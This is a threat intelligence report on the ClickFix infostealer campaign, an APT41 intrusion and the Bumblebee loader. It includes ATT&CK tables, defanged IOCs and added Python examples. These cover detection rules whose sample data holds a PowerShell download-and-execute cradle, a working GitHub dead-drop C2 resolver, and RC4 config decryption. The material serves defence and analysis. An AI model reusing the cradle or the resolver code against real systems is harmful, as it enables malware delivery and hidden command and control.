
This report was processed and collated by the Elemendar CTI team and includes MITRE ATT&CK TTPs and IOCs extracted using one of our products, READ., an AI-driven cyber security tool.
For further information or a demonstration of our products please visit our website: elemendar.ai
Contents
Executive Summary
Beware! Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Chinese Nation-State Threat Actors, APT41 Hit Gambling Sector
Bumblebee malware returns after recent law enforcement disruption
Executive Summary
The ClickFix campaign, which began in May 2024, has become a sophisticated malware distribution operation targeting Windows and macOS systems. It uses social engineering lures such as fake Google Meet pages, phishing emails and fake Facebook pages to trick users into downloading malware. Two groups, Slavic Nation Empire and Scamquerteo, are attributed to this campaign.
These threat actors exploit user naivety by making victims execute the malware themselves, bypassing security tools. The stolen credentials are likely sold on Russian-speaking forums, and the campaign is expected to expand into mo
Beware! Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign

According to Cybersecurity company Sekoia, threat actors from two cybercriminal groups, Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo are responsible for the ongoing ClickFix malware campaign, which began in May 2024. The campaign utilises social engineering methods to target both Windows and macOS systems, using fake Google Meet web pages to deceive users into copying and executing malicious PowerShell code.
Elemendar CTI Analyst comment: The Slavic Nation Empire (SNE) and Scamquerteo are both part of larger organisations, MarkoPolo and CryptoLove, which target cryptocurrency users, Web3 applications and decentralised finance (DeFi) platforms. The shared infrastructure and tactics suggest these groups are using a common cybercriminal service. SNE is known to operate within Russian-speaking cybercriminal forums. Comment Ends.
The ClickFix campaign has targeted multiple sectors through compromised websites and phishing. One notable attack from May to August 2024 targeted transport and logistics companies in North America by impersonating fleet management software. Additionally, a GitHub campaign aimed at developers spread Lumma Stealer by falsely reporting security vulnerabilities, affecting thousands of public code repositories. The attack works by displaying fake error messages in the victim's web browser, prompting them to run a PowerShell command to resolve the issue. The campaign has been seen impersonating well-known online services such as Google Meet, Facebook, Zoom, and Google Chrome. On Windows, it delivers info-stealing malware like StealC and Rhadamanthys, while macOS users are tricked into downloading a malicious disk image file that installs the Atomic stealer (aka AMOS).
Elemendar CTI Analyst comment: StealC, Rhadamanthys and AMOS are widely available on underground forums as malware-as-a-service (MaaS) offerings, with prices ranging from $100-$1000 (USD) per month for StealC and Rhadamanthys, whilst AMOS can cost $1000-$3000 (USD) per month. Apart from the differing target OS, there is little difference in the infostealers' capabilities. Comment Ends.

Fig. 1: Screenshots of fake web services pages (source: Sekoia)
Elemendar Intelligence Assessment: The threat actors behind this campaign have been agnostic in their victimology and have preyed on the naivety of users to infect their systems. By relying on the victim to download and execute the malware themselves, the threat actor sidesteps controls that key on automated exploitation, and is likely to reduce both the time needed to gain access and the footprint left behind.
Both Rhadamanthys and StealC harvest credentials stored on the host: browser-saved passwords, cookies and session tokens, and wallet and application data. Where that material includes corporate SSO, VPN or remote-access credentials, it gives follow-on actors a foothold from which to escalate privileges, create backdoor accounts or modify existing ones to maintain persistence, and keep harvesting credentials for as long as access lasts. These credentials are then highly likely to be sold within Russian-speaking cybercriminal forums.
Given the believed success of the ClickFix campaign, it is highly likely to endure, and a rise in the number of victims from other verticals is likely to be seen within the next six months. Assessment Ends.
Chinese Nation-State Hackers APT41 Hit Gambling Sector

In a report released by cybersecurity company Security Joes, APT41 (aka Brass Typhoon, Wicked Panda and Winnti) was linked to a sophisticated and prolonged cyber attack on the gambling and gaming industry. The attack, which spanned nearly nine months during 2024, focused on gathering sensitive information such as network configurations, user passwords and secrets from the LSASS process.
Elemendar CTI Analyst comment: APT41 is a Chinese state-sponsored threat group that conducts both espionage and financially motivated operations across multiple geographical regions and industries. Its espionage targeting has included healthcare, telecommunications and high-tech organisations, with a strong focus on intellectual property theft until 2015. APT41 also conducts surveillance, tracking individuals in sectors such as higher education and media. On the financial side, the group has previously targeted the video game industry through source code theft, virtual currency manipulation and ransomware deployment. APT41 is also known for supply chain compromises, injecting malicious code into legitimate software updates. Comment Ends.

Fig. 2: Geographical locations and industries targeted by APT41 (Source: Mandiant)
During the intrusion, APT41 continuously updated their toolset to adapt to the victim's security defences. According to Security Joes, APT41 adjusted their tactics based on the defensive measures taken by the targeted organisation, ensuring their persistence and continued access to the compromised network.
Security Joes noted overlaps with Operation Crimson Palace, a campaign tracked by cybersecurity company Sophos, which shares many similarities with APT41's methods. The initial access vector is unclear, but spear-phishing is suspected, as no evidence of vulnerability exploitation or supply chain compromise was found. Once inside the network, the attackers performed a DCSync attack, abusing directory replication rights to pull password hashes for service and administrator accounts from a domain controller, giving them high-privilege credentials.
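DCSync leaves a recognisable trace: a Windows Security event 4662 on the domain controller in which an account that is not itself a DC requests the directory replication control-access rights. The rule below, an added example written for this page and not part of the Security Joes or Elemendar reporting, runs that check over a handful of constructed, simplified 4662 records (real events carry more fields; only the ones the rule reads are included).

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example, not from the Security Joes or Elemendar report. The three
control-access-right GUIDs are the ones Active Directory checks before
serving replication data; a non-DC account requesting them is the
classic DCSync signature. Events below are constructed and simplified.
"""
import re

# Extended rights that a DCSync client (e.g. mimikatz lsadump::dcsync) needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed 4662 records as 'key=value' pairs separated by ';'.
SAMPLE_EVENTS = [
    "EventID=4662;SubjectUserName=DC01$;ObjectType=domainDNS;AccessMask=0x100;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=svc_backup;ObjectType=domainDNS;AccessMask=0x100;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jsmith;ObjectType=user;AccessMask=0x20;"
    "Properties={bf967a86-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624;SubjectUserName=jsmith;LogonType=3",
]

GUID_RE = re.compile(
    r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.I)


def parse_event(line):
    """Split a 'k=v;k=v' record into a dict."""
    fields = {}
    for part in line.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields


def is_domain_controller(account, dc_accounts):
    """DC machine accounts (DC01$ etc.) replicate with each other legitimately."""
    return account.upper() in {a.upper() for a in dc_accounts}


def detect_dcsync(events, dc_accounts):
    """Return (account, [rights]) for each non-DC account requesting replication rights."""
    hits = []
    for line in events:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
        if not rights:
            continue
        account = ev.get("SubjectUserName", "")
        if is_domain_controller(account, dc_accounts):
            continue
        hits.append((account, rights))
    return hits


if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS, dc_accounts=["DC01$", "DC02$"]):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

In production the DC allowlist should also cover accounts that legitimately replicate (for example a directory synchronisation service account), and the alert should be raised on the first hit rather than batched, since a single successful DCSync yields every domain hash.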
In this campaign, APT41 used several advanced techniques, including Phantom DLL Hijacking and legitimate tools like wmic.exe, to evade detection. This use of common utilities helps them to mask their operation within normal system operations, further obfuscating detection.
One of the more sophisticated elements of this attack was the group's use of a custom command-and-control (C2) mechanism. After initially establishing contact with a hard-coded C2 server, the malware would update its C2 information by scraping GitHub users' profiles. This unique method involved parsing GitHub search results for specific patterns, creating an 8-character string that encoded the IP address of a new C2 server. This dynamic approach allowed APT41 to maintain control over the compromised systems even if the original C2 infrastructure was disrupted.
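The mechanism described above is a dead-drop resolver: the implant never needs a hard-coded fallback, only a public page it can read and a rule for pulling the next address out of it. The following is an added example written for this page, not APT41's code. The public report does not give the encoding scheme, so two assumptions are made and labelled in the code: the 8-character token is the IPv4 address as eight hex digits (four bytes), and it sits between the hypothetical markers `ptr-` and `-ptr` in a profile field. The search-page snippet is constructed.

```python
"""Dead-drop resolver over a GitHub user search page, plus a defender-side check.

Added example, not APT41's code. Assumptions (not stated in the public report):
the 8-character token is the IPv4 address as 8 hex digits, and it is wrapped in
the hypothetical markers 'ptr-' ... '-ptr' inside a profile field. The HTML
below is a constructed stand-in for github.com/search?...&type=Users.
"""
import ipaddress
import re

MARKER_RE = re.compile(r"ptr-([0-9a-fA-F]{8})-ptr")

SAMPLE_SEARCH_PAGE = """
<div class="user"><a href="/alice-dev">alice-dev</a><p>Rust and pointers enthusiast</p></div>
<div class="user"><a href="/pointers-fan">pointers-fan</a><p>ptr-c0a80a15-ptr</p></div>
<div class="user"><a href="/bob">bob</a><p>ptr-zzzz1234-ptr looks similar but is not hex</p></div>
<div class="user"><a href="/carol">carol</a><p>ptr-0a000005-ptr</p></div>
"""

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}


def encode_ip(ip):
    """Operator side: dotted IPv4 -> 8 hex characters planted in a profile."""
    return int(ipaddress.IPv4Address(ip)).to_bytes(4, "big").hex()


def decode_token(token):
    """Implant side: 8 hex characters -> dotted IPv4."""
    return str(ipaddress.IPv4Address(bytes.fromhex(token)))


def resolve_c2(page_html):
    """Every decodable candidate in page order; the implant would take the first."""
    return [decode_token(t) for t in MARKER_RE.findall(page_html)]


def is_dead_drop_lookup(url, process_name):
    """Defender side: a user-search query fetched by something other than a browser."""
    u = url.lower()
    return ("github.com/search?" in u and "type=users" in u
            and process_name.lower() not in BROWSERS)


if __name__ == "__main__":
    print(resolve_c2(SAMPLE_SEARCH_PAGE))
```

Because the operator controls which profiles exist and how recently they joined (the report's query sorts by join date), rotating the C2 is just creating a new account; the defender's leverage is therefore on the fetch itself, which is why the last function keys on the process making the request rather than on the address it receives.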
In the later stages of the attack, APT41 used heavily obfuscated JavaScript code hidden within a modified XSL file. This malicious script was executed through the legitimate wmic.exe tool to download additional payloads and gather system information. The malware specifically targeted devices within certain VPN subnets, filtering infected machines by their IP addresses to focus only on high-value targets.
Despite being detected and going silent for several weeks, APT41 returned with a new approach, demonstrating their persistence and adaptability.
Elemendar Intelligence Assessment: Given the previous victimology and the methodical, highly skilled approach to this attack, it is highly likely that APT41 are responsible for this ongoing campaign.
The continuous updating of their toolset, the custom C2 mechanism and the layered obfuscation demonstrate an adaptive strategy that shows APT41's ability to evolve in real time, making it challenging for security teams to fully mitigate the threat.
APT41 presents an enduring threat to multiple verticals regardless of geographical location; this is highly unlikely to change. Attack frequency will depend on instruction from the state apparatus sponsoring their activity and is likely to fluctuate depending on geopolitical issues, such as sanctions or interest in advancing state-sponsored technological programmes. Assessment Ends.
Bumblebee malware returns after recent law enforcement disruption

According to researchers at cybersecurity company Netskope, the Bumblebee malware loader has resurfaced in recent attacks, more than four months after Europol disrupted its operations during Operation Endgame in May 2024. Bumblebee, which is believed to have been developed by the same group behind TrickBot, first emerged in 2022 as a replacement for BazarLoader, enabling ransomware actors to infiltrate networks. The malware is typically spread through phishing, malvertising and SEO poisoning, where fake software such as Zoom, Cisco AnyConnect and Citrix Workspace is promoted to trick users into downloading malicious files.
Elemendar CTI Analyst comment: In May 2024, Operation Endgame, a coordinated law enforcement operation led by Europol, targeted the infrastructure supporting multiple malware loaders, including Bumblebee, IcedID, Pikabot and TrickBot. Four arrests were made, 100 servers were seized and 2,000 domains were placed under the control of law enforcement during this operation. One of the four suspects arrested is alleged to have earned $74 million (USD) by renting out ransomware infrastructure. Comment Ends.
The latest Bumblebee attack chain starts with a phishing email that tricks victims into downloading a malicious ZIP archive. This archive contains a .LNK shortcut (named Report-41952.lnk), which, when clicked, triggers PowerShell to download and execute a fake NVIDIA driver update or Midjourney installer from a remote server. The file, a malicious MSI (Windows Installer), is executed silently using msiexec.exe with the /qn option, ensuring no user interaction is required during the malware's execution.
Elemendar CTI Analyst comment: Netskope did not provide specific details on the payloads deployed by Bumblebee in these latest attacks. Past variants of the malware have delivered Cobalt Strike beacons, information-stealing malware, and various ransomware strains. Comment Ends.
One of Bumblebee's key stealth techniques is to avoid spawning new processes, which would be noisier and more likely to trigger security alerts. Instead, it relies on the SelfReg table within the MSI structure: entries in that table make msiexec.exe load the listed DLL into its own address space and call its DllRegisterServer export, so the payload runs without a child process such as rundll32.exe or regsvr32.exe appearing, reducing its footprint and making it harder for security tools to detect.
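Each of the three intrusions in this report begins with a living-off-the-land execution step that is visible in process-creation telemetry: the ClickFix chain has explorer.exe (the Run dialog) launching PowerShell with a download cradle, APT41 has wmic.exe rendering output through an XSL file, and Bumblebee has PowerShell launching a silent msiexec.exe install. The following is an added example written for this page, not Elemendar's or any vendor's detection content; the events are constructed Sysmon-style records (the URL in the first one is a defanged domain from this report's IOC list), and each rule is written to fire on the malicious record and stay quiet on the two benign ones.

```python
"""Process-creation rules for the three execution chains in this report:
ClickFix's Run-dialog PowerShell cradle, APT41's wmic.exe /format: XSL
execution, and Bumblebee's LNK -> PowerShell -> msiexec /qn install.

Added example for this page, not vendor or Elemendar detection content.
SAMPLE_EVENTS are constructed Sysmon-style records.
"""
import re

SAMPLE_EVENTS = [
    # ClickFix: victim pastes the clipboard command into the Run dialog, so the
    # PowerShell parent is explorer.exe rather than a script host
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr -useb hxxps://meet.google.us-join[.]com/check)"'},
    # APT41: XSL script processing through wmic.exe
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": 'wmic os get /format:"texttable.xsl"'},
    # Bumblebee: PowerShell (started by the .LNK) installs the downloaded MSI silently
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\nvidia_update.msi /qn"},
    # Benign: interactive PowerShell from a taskbar shortcut
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile"},
    # Benign: silent install pushed by a software deployment agent
    {"ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i \\fileshare\apps\7zip.msi /qn"},
]

# Download-and-run idioms that a command pasted into the Run dialog should never need.
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile|"
    r"curl|wget|encodedcommand|frombase64string)\b|\s-e(?:nc?|c)?\s|h(?:tt|xx)ps?://",
    re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_clickfix(ev):
    """Explorer-spawned script host carrying a download cradle on its command line."""
    return (basename(ev["ParentImage"]) == "explorer.exe"
            and basename(ev["Image"]) in {"powershell.exe", "pwsh.exe", "mshta.exe"}
            and CRADLE_RE.search(ev["CommandLine"]) is not None)


def rule_wmic_xsl(ev):
    """wmic.exe told to render output with an XSL file or a remote stylesheet."""
    cl = ev["CommandLine"].lower()
    return basename(ev["Image"]) == "wmic.exe" and "/format:" in cl and (".xsl" in cl or "http" in cl)


def rule_msiexec_quiet(ev):
    """Silent MSI install started by a script host, or from a temp path or URL."""
    cl = ev["CommandLine"].lower()
    quiet = re.search(r"\s/q[nb]?(\s|$)", cl) is not None
    scripted = basename(ev["ParentImage"]) in SCRIPT_HOSTS
    return (basename(ev["Image"]) == "msiexec.exe" and quiet
            and (scripted or "http" in cl or "\\temp\\" in cl))


RULES = [("clickfix_cradle", rule_clickfix),
         ("wmic_xsl_script", rule_wmic_xsl),
         ("msiexec_quiet_scripted", rule_msiexec_quiet)]


def evaluate(events):
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The msiexec rule deliberately keys on the msiexec.exe process itself rather than on its children, because, as described above, the SelfReg approach means Bumblebee's DLL runs inside msiexec.exe and no child process is ever created.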
Once executed, the Bumblebee malware is unpacked into memory, and its core payload is loaded. The payload includes Bumblebee’s signature internal DLL and uses RC4 encryption to decrypt its configuration. The latest samples of Bumblebee identified by Netskope use the "NEW_BLACK" string as the RC4 key for decryption, along with campaign IDs like "msi" and "lnk001" to track specific attacks.
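Knowing that the configuration is RC4-encrypted under a fixed string is what lets an analyst recover C2 and campaign data from a memory dump without running the sample. The block below, an added example for this page and not Bumblebee's or Netskope's code, implements RC4 in full and then tries a list of candidate keys against an encrypted blob, keeping the first key whose output looks like configuration text. Only the key "NEW_BLACK" comes from the report; the configuration layout (NUL-separated strings), the placeholder "old" key and the ciphertext are constructed here so the example runs offline.

```python
"""RC4 config recovery for the Bumblebee behaviour described above.

Added example for this page, not Bumblebee's or Netskope's code. Only the
key 'NEW_BLACK' comes from the report; the config layout, the placeholder
old key and the ciphertext are constructed so the example runs offline.
"""


def rc4(key, data):
    """RC4 keystream XORed over data; one function both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Constructed config: campaign ID and C2 string separated by NUL bytes.
PLAINTEXT_CONFIG = b"lnk001\x00c2.example.invalid:443\x00"
# Stands in for the blob an analyst would carve from the unpacked payload.
ENCRYPTED_CONFIG = rc4(b"NEW_BLACK", PLAINTEXT_CONFIG)

# Keys tried in order: a placeholder for a previously seen key, then the reported one.
CANDIDATE_KEYS = [b"PLACEHOLDER_OLD_KEY", b"NEW_BLACK"]


def looks_like_text(data):
    """Heuristic: config strings decrypt to printable ASCII plus NUL separators."""
    return len(data) > 0 and all(b == 0 or 0x20 <= b < 0x7F for b in data)


def recover_config(blob, keys):
    """Try each candidate key; return the first that yields plausible config fields."""
    for key in keys:
        plain = rc4(key, blob)
        if looks_like_text(plain):
            fields = [f.decode("ascii") for f in plain.split(b"\x00") if f]
            return {"key": key, "fields": fields}
    return None


if __name__ == "__main__":
    print(recover_config(ENCRYPTED_CONFIG, CANDIDATE_KEYS))
```

Because RC4 has no integrity check, a wrong key simply produces noise rather than an error, which is why the printable-text heuristic (or a known marker such as a campaign ID) is needed to tell a correct decryption from an incorrect one. The same key list is the natural place to record each new string the operator rotates to.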
Elemendar Intelligence Assessment: As seen with the LockBit takedown in February 2024, a drop in operational activity is highly likely following a law enforcement operation, before a resurgence is observed. This is likely to be the case with Bumblebee.
It is likely that the malware's code was retained and sold to a new operator. Whilst full details of the malware's payload have not been released, Bumblebee is highly likely to have been modified by this operator into a more potent strain.
Netskope's report describes how the malware has been modified to make it harder for security solutions to detect, to improve persistence and to extract data more efficiently. Bumblebee therefore presents an ongoing threat to all verticals. Assessment Ends.
Annex A: References
Beware! Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.htm
https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/#h-victimology-of-clickfix-clusters
Chinese Nation-State Threat Actors, APT41 Hit Gambling Sector
https://rhisac.org/threat-intelligence/chinese-nation-state-hackers-apt41-attack-gambling-sector-for-financial-gain/
https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
https://cybersrcc.com/2024/10/22/chinese-nation-state-hackers-apt41-hit-gambling-sector-for-financial-gain/
Bumblebee malware returns after recent law enforcement disruption
https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-after-recent-law-enforcement-disruption/
https://www.darkreading.com/threat-intelligence/lockbit-ransomware-takedown-strikes-brand-viability
Annex B: STIX Entities
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Mitre ATT&CK TTPs
ID | Name | Tactic | Description |
T1567.004 | Exfiltration Over Webhook | Exfiltration | Adversaries may use a webhook to send data from a compromised network to an external location, effectively exfiltrating sensitive information. |
T1064 | Scripting (deprecated; now covered by T1059 Command and Scripting Interpreter) | Execution | Adversaries may abuse scripting languages for execution, allowing them to automate the deployment and execution of payloads and commands on a system. |
T1587 | Develop Capabilities | Resource Development | Adversaries may build capabilities, including malware, for use in future campaigns to compromise and control victims' systems. |
T1562 | Impair Defences | Defence Evasion | Adversaries may impair security defences by disabling or modifying security controls to avoid detection and response. |
T1590.005 | IP Addresses | Reconnaissance | Adversaries may gather information about IP addresses related to their targets to prepare for exploitation or intrusion. |
T1115 | Clipboard Data | Collection | Adversaries may capture or write clipboard data; in ClickFix the malicious command is placed on the clipboard for the victim to paste. |
T1059.006 | Python | Execution | Adversaries may use Python scripts for execution of malicious payloads, leveraging its versatility and widespread use for command execution. |
T1027.010 | Command Obfuscation | Defence Evasion | Adversaries may use command obfuscation techniques, such as encoding or compression, to conceal malicious commands and avoid detection. |
T1059.005 | Visual Basic | Execution | Visual Basic can be used to execute arbitrary commands and scripts, enabling adversaries to leverage VB scripts for malicious purposes. |
T1036.009 | Break Process Trees | Defence Evasion | Adversaries may break process trees to hide the origin of malicious processes, making it harder to detect suspicious activity. |
T1608 | Stage Capabilities | Resource Development | Adversaries may stage capabilities such as malware or tools in preparation for future operations by uploading them to servers or cloud storage. |
T1583.001 | Domains | Resource Development | Adversaries may register domains to support malicious activities, including phishing, command-and-control, or delivery of payloads. |
T1569 | System Services | Execution | Adversaries may abuse system services or daemons to execute commands or programs. |
T1204 | User Execution | Execution | Adversaries rely on user execution, where a victim inadvertently executes malicious code, often via phishing or social engineering tactics. |
T1587.001 | Malware | Resource Development | Adversaries may develop or purchase malware as a part of their toolset to carry out their operations against targets. |
T1189 | Drive-by Compromise | Initial Access | Adversaries may gain initial access when a user visits a website, including through exploitation of browser or plugin vulnerabilities, without the user knowingly executing anything. |
T1590.002 | DNS | Reconnaissance | Adversaries may gather information on DNS records to understand target infrastructure and plan their attack. |
IOCs
Type | Value |
Domain Name | meet.google.us-join[.]com |
Domain Name | meet.googie.com-join[.]us |
Domain Name | meet.google.com-join[.]us |
Domain Name | meet.google.web-join[.]com |
Domain Name | meet.google.webjoining[.]com |
Domain Name | meet.google.cdm-join[.]us |
Domain Name | meet.google.us07host[.]com |
Domain Name | googiedrivers[.]com |
Domain Name | us01web-zoom[.]us |
Domain Name | us002webzoom[.]us |
Domain Name | web05-zoom[.]us |
Domain Name | webroom-zoom[.]us |
Domain Name | alienmanfc6[.]com |
Domain Name | apunanwu[.]com |
Domain Name | bowerchalke[.]com |
Domain Name | carolinejuskus[.]com |
Domain Name | cautrucanhtuan[.]com |
Domain Name | cphoops[.]com |
Domain Name | dekhke[.]com |
Domain Name | iloanshop[.]com |
Domain Name | kansaskollection[.]com |
Domain Name | lirelasuisse[.]com |
Domain Name | mdalies[.]com |
Domain Name | mensadvancega[.]com |
Domain Name | mishapagerealty[.]com |
Domain Name | modoodeul[.]com |
Domain Name | pabloarruda[.]com |
Domain Name | pakoyayinlari[.]com |
Domain Name | patrickcateman[.]com |
Domain Name | phperl[.]com |
Domain Name | stonance[.]com |
Domain Name | utv4fun[.]com |
URL | hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj |
URL | hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh |
URL | hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays |
URL | hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa |
SHA256 | a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c |
SHA256 | 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe |
SHA256 | 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 |
SHA256 | 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138 |
Chinese Nation-State Threat Actors, APT41 Hit Gambling Sector
Mitre ATT&CK TTPs
ID | Name | Tactic | Description |
T1584.008 | Network Devices | Resource Development | Adversaries may compromise third-party network devices (such as routers or SOHO equipment) and use them as infrastructure for their operations. |
T1556.001 | Domain Controller Authentication | Credential Access | Adversaries may target domain controller authentication mechanisms to steal or forge authentication tickets to access network resources. |
T1562 | Impair Defences | Defence Evasion | Adversaries may disable or manipulate security tools and defences, such as antivirus or firewalls, to avoid detection and facilitate malicious activities. |
T1098.005 | Device Registration | Persistence | Adversaries may manipulate device registrations, such as registering new devices to authenticated accounts, allowing continued access to cloud environments. |
T1078 | Valid Accounts | Persistence | Adversaries may obtain and abuse credentials of existing accounts to gain access and maintain persistence within the victim environment. |
T1548.005 | Temporary Elevated Cloud Access | Privilege Escalation | Adversaries may exploit temporary elevated cloud access tokens to escalate privileges within cloud environments, gaining unauthorised control over resources. |
T1098 | Account Manipulation | Persistence | Adversaries may manipulate accounts by creating, modifying, or disabling accounts to maintain persistence or facilitate lateral movement. |
T1552 | Unsecured Credentials | Credential Access | Adversaries may search for unsecured credentials, such as plaintext passwords or API tokens, in files or system memory, to gain unauthorised access. |
T1598 | Phishing for Information | Reconnaissance | Adversaries may use phishing techniques to solicit information from victims, such as personal data or credentials, under the guise of legitimate communication. |
T1586.002 | Email Accounts | Resource Development | Adversaries may compromise or create email accounts to support operations such as phishing, command-and-control, or exfiltration of sensitive information. |
T1566 | Phishing | Initial Access | Adversaries use phishing to deliver malicious links, attachments, or credential lures to unsuspecting users, gaining initial access to the victim's environment. |
T1055.001 | Dynamic-link Library Injection | Defence Evasion | Adversaries may inject malicious code into processes using DLL injection, allowing them to evade detection and run their code in the context of another process. |
T1218.002 | Control Panel | Defence Evasion | Adversaries may use Control Panel items to execute malicious payloads or evade detection by leveraging this native Windows feature. |
T1574.002 | DLL Side-Loading | Defence Evasion | Adversaries may execute malicious code by side-loading a malicious DLL alongside a legitimate executable that loads the DLL during execution. |
IOCs
Type | Value |
C2 | time.qnapntp[.]com |
Fallback C2 (dead-drop resolver) | github[.]com/search?o=desc&q=pointers&s=joined&type=Users& |
File | TSVIPSrv.dll |
File | texttable.xsl |
Bumblebee malware returns after recent law enforcement disruption
Mitre ATT&CK TTPs
ID | Name | Tactic | Description |
T1587.001 | Malware | Resource Development | Adversaries may develop, acquire, or modify malware to achieve their objectives during an operation, including initial access or privilege escalation. |
T1204 | User Execution | Execution | Adversaries rely on user execution of malicious files or links, often achieved through social engineering, to deliver and execute payloads in the target environment. |
T1546.009 | AppCert DLLs | Persistence | Adversaries may establish persistence by registering AppCert DLLs, which are loaded into processes, providing a way to execute code upon process execution. |
T1055.001 | Dynamic-link Library Injection | Defence Evasion | Adversaries may inject malicious code into processes by using DLL injection, enabling their code to run within another process context to evade detection. |
T1564.010 | Process Argument Spoofing | Defence Evasion | Adversaries may alter process arguments to spoof legitimate activity or hide malicious processes, allowing them to evade detection from monitoring tools. |
T1218.011 | Rundll32 | Defence Evasion | Adversaries may use Rundll32.exe to execute code, leveraging this legitimate Windows utility to bypass security controls and evade detection. |
T1480.001 | Environmental Keying | Defence Evasion | Adversaries may use environmental keying to protect malware from running in unintended environments by tying its execution to specific hardware or software configurations. |
IOCs
Type | Value |
File | msiexec.exe (legitimate Windows Installer binary abused for execution; not an indicator on its own) |
Probability Language
This document uses probability language based on assessment. Further information can be found in the image below:

Feedback
We welcome your feedback, this ensures we meet your needs.
Please contact our CTI Director at : CTI@elemendar.ai
Acknowledgements
Authored by Paul Montgomery, CTI Director Elemendar